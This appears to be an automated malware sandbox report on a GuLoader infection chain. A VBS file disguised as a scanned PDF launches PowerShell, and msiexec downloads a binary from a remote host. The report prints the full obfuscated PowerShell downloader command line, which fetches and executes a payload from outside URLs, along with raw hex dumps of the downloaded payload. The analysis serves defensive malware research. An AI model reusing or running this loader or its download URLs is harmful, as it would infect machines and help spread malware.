                                                              2024-10-21 15:07:04 UTC16384INData Raw: 5a 6f 47 37 59 76 4b 47 47 6a 68 6b 4e 4c 75 62 39 58 39 4c 73 36 6b 38 74 4f 49 4e 4b 4e 41 69 54 37 78 6c 50 42 7a 4d 67 43 7a 51 72 41 39 4d 61 59 65 5a 6d 35 62 72 67 54 68 4a 4f 52 6a 45 6a 6b 66 65 41 68 33 41 4c 30 63 5a 62 34 33 46 6c 5a 2f 65 32 76 66 74 30 53 74 71 4e 4f 50 6a 4d 62 56 55 72 46 41 68 31 62 57 4c 2b 70 62 7a 58 44 53 69 4e 78 62 65 74 57 4c 44 39 34 4a 71 74 6a 53 36 6d 5a 68 45 58 32 6f 37 73 34 75 4f 43 65 30 4e 38 79 67 49 6e 31 4c 39 2f 51 6c 4a 4f 7a 4b 75 69 48 71 43 67 2b 6c 6d 34 56 62 64 6c 6d 44 31 59 69 50 72 31 53 51 31 76 56 54 6a 76 43 44 48 34 6a 57 31 33 52 6c 6e 50 73 46 77 4e 4c 56 55 59 74 71 31 55 4f 4d 31 34 75 76 68 2b 4f 38 32 59 73 4c 6b 42 30 51 62 4e 4a 4e 4f 56 37 66 6e 73 61 6b 38 74 75 49 50 4b 44 4a
                                                              Data Ascii: ZoG7YvKGGjhkNLub9X9Ls6k8tOINKNAiT7xlPBzMgCzQrA9MaYeZm5brgThJORjEjkfeAh3AL0cZb43FlZ/e2vft0StqNOPjMbVUrFAh1bWL+pbzXDSiNxbetWLD94JqtjS6mZhEX2o7s4uOCe0N8ygIn1L9/QlJOzKuiHqCg+lm4VbdlmD1YiPr1SQ1vVTjvCDH4jW13RlnPsFwNLVUYtq1UOM14uvh+O82YsLkB0QbNJNOV7fnsak8tuIPKDJ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.1149973199.103.62.2054437092C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-21 15:07:52 UTC174OUTGET /PrOrl135.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: www.groupriam.com
                                                              Cache-Control: no-cache
                                                              2024-10-21 15:07:53 UTC422INHTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: application/octet-stream
                                                              last-modified: Mon, 21 Oct 2024 09:16:16 GMT
                                                              accept-ranges: bytes
                                                              content-length: 494656
                                                              date: Mon, 21 Oct 2024 15:07:52 GMT
                                                              server: LiteSpeed
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 46 02 5a 2a a8 16 9c 7e 12 16 3b 91 56 76 57 1f 20 2b b3 d8 e6 08 fe 3e 28 4f 52 a9 60 92 9c dc a0 ed 95 c3 9a 76 81 6e 75 13 7d fe 9c b4 36 14 12 1e f0 12 60 cb 59 e6 fc c6 72 ef 53 b3 54 b8 d4 62 05 b5 e5 5a b9 ef 23 66 73 6f fa fb 6f ec df 62 ea 8c a3 82 bd 1f 85 9e 57 1c a0 83 3f 45 16 cd 77 fa c1 f0 d5 25 65 bb 68 ee e2 a3 f2 df 0c 8f 21 96 dc ed ea a2 32 1d 71 f3 7a e9 60 ed a0 68 cd ea a9 ff 3f 77 37 86 57 7f 56 f0 94 30 17 ce 68 41 8d 8d 86 40 15 7e bc 3d 49 27 5d bd 0a 71 d2 61 16 86 08 58 bb 21 f9 16 f9 52 74 09 63 e6 ef 35 d7 af 63 7c 11 bd 4b c4 64 ce 70 1c 0e c7 7b 4d b5 96 26 57 65 bf 9f f2 f6 bd 5c 2c b6 b9 4b 7e 71 87 08 9a 05 48 5f de 0b b6 3b bf 50 a8 97 c7 15 92 63 aa ac e5 b2 ca 84 f6 04 1c 3d 34 0b f8 e4 c1 f8 cb 3d 19 b6 e9 3c 7d 83
                                                              Data Ascii: FZ*~;VvW +>(OR`vnu}6`YrSTbZ#fsoobW?Ew%eh!2qz`h?w7WV0hA@~=I']qaX!Rtc5c|Kdp{M&We\,K~qH_;Pc=4=<}
                                                              2024-10-21 15:07:53 UTC16384INData Raw: eb 3c c5 bf 2d 87 f2 e1 36 ce 21 bd 72 b8 b6 f2 0c 93 51 52 47 3c aa 24 90 62 77 03 42 6c e3 44 73 ae f1 1d a9 e6 c1 1f a0 a2 32 25 14 88 fc a9 23 b5 f3 b9 b4 9e c4 f3 11 df b9 de e4 3c 89 32 30 a5 2a 3f a4 18 dc b0 c8 11 71 0b 52 e4 48 a8 0c 63 91 71 d2 eb 8d 69 57 e4 99 5f 35 62 4c 9e f7 fd c8 38 bf 85 72 97 31 a1 f1 31 2c fa 96 2b 29 79 f1 ea 5e 49 05 45 05 28 49 d6 08 83 b1 1f 9e 96 83 be 07 88 f6 a5 33 34 81 1c 0d e6 37 6d 08 9a e0 51 09 5b df fa d8 23 fc 42 d6 02 22 44 03 05 1d 6a 6f 1b b6 91 01 2e 33 a7 b9 cb 58 87 f2 3b 56 7e 9d 1c 6c 93 78 fe 15 20 1b 4e c0 10 de ca b0 59 22 c5 84 cf 72 20 e9 96 d6 87 27 99 a7 90 d4 88 d7 18 13 eb 01 e5 ca 86 b0 0b b4 b4 3f f9 e4 43 bf 5d 29 8b 73 ea 9d d5 34 04 77 9a 9b dc 7f 22 ed 7c 1f 7a 98 cd db 62 45 d3 f9
                                                              Data Ascii: <-6!rQRG<$bwBlDs2%#<20*?qRHcqiW_5bL8r11,+)y^IE(I347mQ[#B"Djo.3X;V~lx NY"r '?C])s4w"|zbE
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 06 e7 c4 8e 76 68 73 be 30 cf a1 df 25 aa 8d 08 a9 2a 53 d1 92 f8 ad d9 2d cd 15 31 bd eb f0 3f df a2 61 8d af 8e e0 df 54 9b f4 d8 e9 2a f7 67 9d fb 1a 80 66 c7 ef 59 1c 65 47 e1 d6 1d 46 bf 65 3c f6 f3 51 95 dd 81 9d 25 e4 f3 0b 1c 31 5e fd d9 a3 00 10 e8 6b e7 c8 b7 ad a4 83 09 0b ce c8 f4 c1 ba 68 15 4d 75 05 e2 36 90 ca ff 35 f0 0b 64 39 ea 2b d5 7c 4b 68 f9 45 a3 a4 ff 97 cb 29 3f b5 1d 31 7d 49 16 5e c6 6a 08 3e 33 4b aa 0c d6 f1 63 ae 5a 29 87 09 e3 3d f0 62 46 4c 92 ce ff 5d fe b0 b5 ea 6c 51 85 6a 8e 37 fa bd 89 45 3e 47 c9 77 c4 61 c9 59 77 d4 e3 cd 1c 1f ac 06 a8 42 aa f6 5b c2 7c 65 8f bb ce 24 ba c0 ef a8 65 dc 72 eb 0c f4 42 40 88 0d 1f 13 39 4c b6 91 0a 7a c0 f6 72 48 19 ab 08 2f 9b bd c2 ff 68 c9 f7 40 a3 a1 df 1e bf 23 f4 b3 73 a4 df 2b
                                                              Data Ascii: vhs0%*S-1?aT*gfYeGFe<Q%1^khMu65d9+|KhE)?1}I^j>3KcZ)=bFL]lQj7E>GwaYwB[|e$erB@9LzrH/h@#s+
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 99 8a 67 fc a8 8d 47 de ac 16 3e 56 6a c2 13 cc 58 f5 f1 6c 35 17 91 ba cd 8b 43 ce b6 1f 49 33 d2 bd 07 e1 8f c7 7f 31 12 97 a0 c9 6d 42 e2 77 a2 c4 61 dd 0b 06 5d e5 b8 be 6d a3 89 3f 31 8f 97 ca 54 fb 60 fd 8c a9 70 a6 75 c4 c0 9a af 62 0b 4a 3f 6c 5e a1 9d 1d 1b 8d ea 7e ca fc 44 9a 88 53 d1 38 69 1a d1 30 06 99 96 6b f8 e9 e4 3a 7b b0 71 e5 d6 25 11 c6 ee 1c a2 9c 54 66 67 00 5a fa 39 93 2e d0 5b 49 87 93 16 4a b8 21 cb 97 1f e9 79 8c ca 8a 8c 41 44 44 8b 57 e6 8e 8c cc 5b fc 23 c6 ec 39 f6 5e 88 ab 35 6b 9b 3d cd f6 c1 9f 6f 3f 6a 07 ac 46 8c 83 a6 d2 5a 9b 70 b3 0c e0 36 25 20 9d 0d d0 ce 9e 87 57 6e b4 14 ff d4 c4 58 8b 8b 96 26 0f 1b 01 2b 82 62 d3 db cd 28 d3 51 9f fe 49 e0 08 06 3e 42 64 05 2f ee b1 08 46 19 79 91 aa fa fc 5c 00 37 39 f3 6d ac
                                                              Data Ascii: gG>VjXl5CI31mBwa]m?1T`pubJ?l^~DS8i0k:{q%TfgZ9.[IJ!yADDW[#9^5k=o?jFZp6% WnX&+b(QI>Bd/Fy\79m
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 1f 07 2d c6 b9 cb c1 20 4a 47 fe 59 98 e2 5a 74 3a d0 56 b0 46 93 8a 92 5a 22 57 ed e3 11 36 85 6e e4 15 69 d4 ce a8 9a 5a b8 59 6b 5a cb 0e 1d 2a d0 a8 50 73 95 f7 84 e3 d7 1d 61 08 2d 93 42 ad 01 8b ff c0 94 90 03 42 35 05 3e 96 59 54 d9 c5 d3 7c d0 98 5c 59 5c 02 ee 57 cd 86 62 cf 67 40 e5 6e a1 ab c2 5d ea 00 bf 86 32 c5 1f a8 e5 79 ef 51 f0 8d 84 98 8a a9 a4 da 12 e0 e1 a7 db e9 a5 96 73 ce e5 f6 af 64 cd 42 51 5d 7d 3f 03 46 87 57 1e ed b5 ae 0b f7 b4 83 5d 60 a2 8d d3 6e 98 3a 46 78 68 7d 70 74 2d 69 be 06 42 b7 7a 29 80 44 53 ae fd 96 5f 2c 55 b6 b6 a8 90 73 f5 15 26 f3 de 4a a6 86 f1 44 72 8b 38 9f ec 17 fb f1 f1 ca 45 3f 19 5e a5 0c 3b 75 99 19 1b a0 42 d4 ee 4c fa 50 5e 96 c4 6b 83 b7 a9 5d db e2 aa 36 74 5a 6a ed d3 38 73 93 7a 2d dd bb 80 02
                                                              Data Ascii: - JGYZt:VFZ"W6niZYkZ*Psa-BB5>YT|\Y\Wbg@n]2yQsdBQ]}?FW]`n:Fxh}pt-iBz)DS_,Us&JDr8E?^;uBLP^k]6tZj8sz-
                                                              2024-10-21 15:07:53 UTC16384INData Raw: f7 79 a3 c7 a7 27 f6 86 de 5a a3 03 d0 29 cc c0 5a 02 d4 3c 99 1f 2a c1 f9 a5 91 46 57 65 47 c7 54 c1 f0 8d 29 17 d9 ca ae 41 6d a8 53 3a 5b 02 9f 8e b2 30 d0 33 e0 69 47 6c ed ed 5a 94 c2 99 aa fe a8 8a cc 7f 1f 0e ed 4a 34 60 87 26 2e 69 6f db 58 2a 7d 6f 7c 83 e0 bf f4 28 b0 e7 a2 8d dc e1 aa 85 3f c5 18 a4 7f 92 1e d0 5e ed 0d 65 97 36 9d 38 5d 2c 53 b9 5b 07 dc b3 f7 5c 38 f7 83 b0 93 9b 31 72 86 d3 11 24 e7 2f a0 84 62 8d b2 62 ae 49 6a c9 6f e4 56 91 d9 f5 61 79 36 09 8e 34 84 76 1b 35 a5 b6 5d ce 2a 89 ae d8 33 82 a2 8e 89 df c1 75 8a 73 26 51 12 52 ea 18 01 94 67 22 1e 67 cb 6e f0 8f 1a a7 f4 66 18 c4 2e bc 38 76 55 76 d7 64 4c af 2a 08 f7 dc ec 77 03 12 e6 54 d7 16 27 e2 b0 26 d0 ef 8c e7 8b d9 d6 1b 6d 93 a7 75 8e a7 3e 2c c4 55 bb 1e 63 4f 54
                                                              Data Ascii: y'Z)Z<*FWeGT)AmS:[03iGlZJ4`&.ioX*}o|(?^e68],S[\81r$/bbIjoVay64v5]*3us&QRg"gnf.8vUvdL*wT'&mu>,UcOT
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 90 8c 4d e9 01 3d 21 b3 6e 44 10 fa 6f 60 b8 15 59 11 33 78 4f 41 44 64 1e a9 46 25 f8 18 48 ef c5 20 12 dc 96 13 af de 04 91 20 81 bd 80 39 90 59 1c 0f b5 66 53 40 f2 b5 9d a7 66 42 80 57 36 30 08 2f 63 73 77 27 9e 76 13 bb 19 42 af 86 1c fd 59 a5 97 ca 6f c0 90 b0 4b 0e f0 1a 62 9b 7b cd 28 08 d5 dc 52 c9 82 9d f8 3e fd da 54 1f b8 cd ba 7a d4 87 54 c1 ec 21 2b 82 54 d5 25 b9 21 3f 06 96 39 23 f7 16 1c 75 6c a0 0d 06 de db 8f 47 f3 75 d4 d4 6a c5 90 32 de a4 54 e8 49 1a de 4d 2c 03 4a 4c 01 cb e9 f4 4d df 88 ff 68 c7 54 e2 77 e2 8d 36 45 91 3e a9 fc 99 53 ac 21 65 92 3e 55 d2 28 4c 6b 96 bb ae 63 62 46 01 6d 83 67 8c d7 49 2f 2b 72 54 d7 a3 2b f6 4e 98 4e 58 af cd 37 62 bd f7 bd 56 5c ad 60 e9 66 e5 94 7b 04 fc 73 f7 bd 0a 40 03 3b 9d 2e ec 4b 2b 8f 1e
                                                              Data Ascii: M=!nDo`Y3xOADdF%H 9YfS@fBW60/csw'vBYoKb{(R>TzT!+T%!?9#ulGuj2TIM,JLMhTw6E>S!e>U(LkcbFmgI/+rT+NNX7bV\`f{s@;.K+
                                                              2024-10-21 15:07:53 UTC16384INData Raw: e3 fd bd 72 70 ce e3 72 88 be 81 6e 9d d1 29 b5 ef 34 be 97 fa fa c1 8c 0b 83 78 98 27 e7 17 38 c6 3c cd 6c 48 31 5d b9 69 70 25 d7 bf 41 55 bb 3c 10 98 4b 9e ef 0a ca 85 15 56 af b7 8c c4 07 72 8e b0 ce 58 86 b6 ac a5 0b f7 8f bd d4 dd 23 a2 1a f4 06 80 5e e2 8d 7c b2 e5 5d c1 76 4c 29 be e8 a9 4e de 01 bf 9f 18 a6 c7 6c 76 84 65 20 82 0b fc 0d 6a c9 83 da 26 c6 9b 7c b0 69 17 b8 39 4f 47 02 e6 c6 ea 96 18 42 d2 9e 62 86 36 2b ef ca 72 83 10 75 1a 20 13 22 31 e6 7f ed c0 61 2c 8e 86 f2 1e 41 39 41 e6 da 7a b8 4c 40 cc 79 98 da 82 6f 98 db 7c 15 e8 e9 02 f4 e0 3c 1e 27 1b a6 6c 6a d2 97 92 b1 25 0a 64 24 65 27 17 9e 02 69 87 5f 48 c3 e0 72 0b 4e 3a 8f a8 18 1e b7 fb 77 7e 33 21 2b 04 e1 7b bb 2f cd 46 25 ca ab e0 94 de be de 84 04 1a 59 60 5c 99 42 28 9b
                                                              Data Ascii: rprn)4x'8<lH1]ip%AU<KVrX#^|]vL)Nlve j&|i9OGBb6+ru "1a,A9AzL@yo|<'lj%d$e'i_HrN:w~3!+{/F%Y`\B(
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 75 87 cd b5 ab ba f8 61 fe 0f 20 e9 21 8f 9b a3 b6 4b 25 f9 3c 68 ca 1b 06 ee ba b0 f6 61 79 36 9e 29 ed 0e 3c d4 f1 bb fe 42 b8 e6 64 d8 72 b4 f6 49 cc 88 8f 29 66 1e 7d a2 50 56 76 f6 1e 28 97 e0 55 9d 84 c9 15 52 c2 de 7b e8 cf bb a6 ef b4 4c 25 ec e5 a7 0f 4c 76 18 c7 e4 91 43 cd 61 0a e9 1f a2 e9 0e 57 71 76 5b e3 9f 37 ea c9 50 1d 4c cf a1 f2 bf 65 4a 2a 1d f9 ce 53 89 69 28 fe db 0e 82 14 5c 86 02 54 07 08 e8 17 59 3d cb 90 4b 78 f8 92 53 d6 e5 45 8d 1d 2e 82 10 f3 9a 6c 6e 41 9a 2e 81 67 7b 02 c3 45 fe 7d 57 69 e9 c4 71 80 b2 db 10 e1 8b bb 1c c1 6c 0e e9 77 ec d3 ca a5 5d b2 d8 fd 65 4e cc bc 27 1c 3a 36 31 6e 43 14 20 3b 23 11 a3 6d 46 86 61 fb e2 45 35 94 95 1f ea e0 db a2 8e b7 2e a2 87 00 b3 52 62 34 85 71 be 10 22 69 f2 3c 7b 94 34 18 8a 07
                                                              Data Ascii: ua !K%<hay6)<BdrI)f}PVv(UR{L%LvCaWqv[7PLeJ*Si(\TY=KxSE.lnA.g{E}Wiqlw]eN':61nC ;#mFaE5.Rb4q"i<{4
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 94 9c 0f ae f5 bb f7 16 0c d9 4d d2 46 72 53 cc 48 9b e6 2a 77 e8 77 4c 5d 58 f5 9d 2f 7b cd 7b d2 fa ca f3 ac 9c 46 9d e5 7f 65 4f 03 bc e3 a4 52 c1 c7 31 6d ba 06 31 83 41 cb 63 45 fd 7e 3b 19 c2 97 3d ab 88 1f 20 36 28 5b b6 e2 61 8a d6 31 8e 24 d9 6b a0 a4 88 a8 39 d4 09 b1 90 d0 09 b7 4f 63 ad aa 87 00 76 fd 27 e7 0e a1 93 9f 18 1b 97 73 a7 aa 2b 9b ac 2f ea 4a da 85 91 8f 11 dc 7d 53 42 2c 05 5f f2 b5 e5 38 38 7c 2f 36 e1 b9 37 c2 7b 48 14 61 87 ab e1 77 62 9b 9c 3e 3d 67 84 89 84 c4 07 1c 3b 20 50 78 be 18 34 56 c9 1e fb 41 82 3b 0d 76 bc 9d 23 66 4c 04 5c d1 97 4f 31 44 d8 25 18 03 16 12 9e e8 81 13 8e 72 8d 9f 63 ca 92 76 e6 44 4b c4 08 35 88 92 81 83 bd da 65 8a 31 45 cf 31 a8 ee eb ba 77 95 d8 75 67 65 d2 9f 2f 54 a4 2e 8e f4 73 82 e6 bd 9a f7
                                                              Data Ascii: MFrSH*wwL]X/{{FeOR1m1AcE~;= 6([a1$k9Ocv's+/J}SB,_88|/67{Hawb>=g; Px4VA;v#fL\O1D%rcvDK5e1E1wuge/T.s


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:11:06:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
                                                              Imagebase:0x7ff6b9b10000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping gormezl_6777.6777.6777.677e
                                                              Imagebase:0x7ff7d89d0000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
                                                              Imagebase:0x7ff6eb350000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

